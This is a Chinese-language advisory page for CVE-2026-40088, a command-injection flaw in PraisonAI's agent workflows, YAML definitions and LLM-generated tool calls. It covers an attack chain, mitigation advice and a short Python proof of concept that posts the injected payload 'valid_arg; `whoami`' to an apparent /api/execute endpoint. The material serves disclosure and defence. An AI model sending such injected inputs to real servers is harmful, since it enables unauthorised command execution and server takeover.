CVE-2026-40088 CVSS 9.6 严重

CVE-2026-40088 PraisonAI远程代码执行漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40088

漏洞类型

远程代码执行

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PraisonAI

漏洞概述

PraisonAI在4.5.121版本之前存在严重的安全漏洞。由于execute_command函数和工作流shell执行未对用户输入进行有效隔离，攻击者可通过智能体工作流、YAML定义或LLM生成的工具调用注入任意shell命令。该漏洞无需认证即可通过网络触发，可能导致服务器被完全接管。

技术细节

该漏洞的核心在于PraisonAI未能正确处理来自外部的不可信输入。系统在处理智能体工作流、解析YAML配置文件以及执行大语言模型（LLM）生成的工具调用时，直接将用户提供的参数传递给底层的shell执行环境。攻击者可以利用Shell元字符（如分号、反引号、管道符等）破坏原有命令结构，拼接并执行恶意的系统指令。由于CVSS评分为9.6且无需认证，攻击者只需诱导用户进行简单的交互或利用系统自动化的LLM调用接口，即可在服务器端实现远程代码执行，进而获取系统敏感数据、篡改文件甚至破坏服务可用性。

攻击链分析

STEP 1

侦察

攻击者识别出运行PraisonAI且版本低于4.5.121的目标系统。

STEP 2

构造载荷

攻击者利用shell元字符（如;或`）构造包含恶意命令的输入数据，伪装成正常的智能体工作流或YAML定义。

STEP 3

投递载荷

攻击者通过网络将构造好的恶意数据发送给PraisonAI的API接口，可能需要诱导用户进行某种交互（UI:R）。

STEP 4

执行命令

后端未经过滤直接将输入传递给shell环境，导致注入的恶意系统命令在服务器上被执行。

STEP 5

建立控制

攻击者利用执行结果获取服务器权限，进一步窃取数据或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-40088: Command Injection in PraisonAI
# This script demonstrates how to inject shell commands via user-controlled input.

import requests

def exploit(target_url):
    # The vulnerability exists in the execute_command function or workflow shell execution.
    # Attackers can inject arbitrary commands using shell metacharacters like ';', '|', or '`'.
    
    malicious_payload = "valid_arg; `whoami`" 
    
    # Simulating a request to the vulnerable endpoint (e.g., agent workflow or YAML processing)
    endpoint = f"{target_url}/api/execute"
    
    data = {
        "input": malicious_payload,
        "workflow_type": "agent" 
    }
    
    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, json=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if command was executed.")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8000" # Replace with actual target
    exploit(target)

影响范围

PraisonAI < 4.5.121

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用受影响的智能体工作流和YAML定义功能，并在网络边界处部署WAF规则以拦截包含shell元字符的恶意请求，同时密切监控系统日志中是否存在异常的shell进程调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表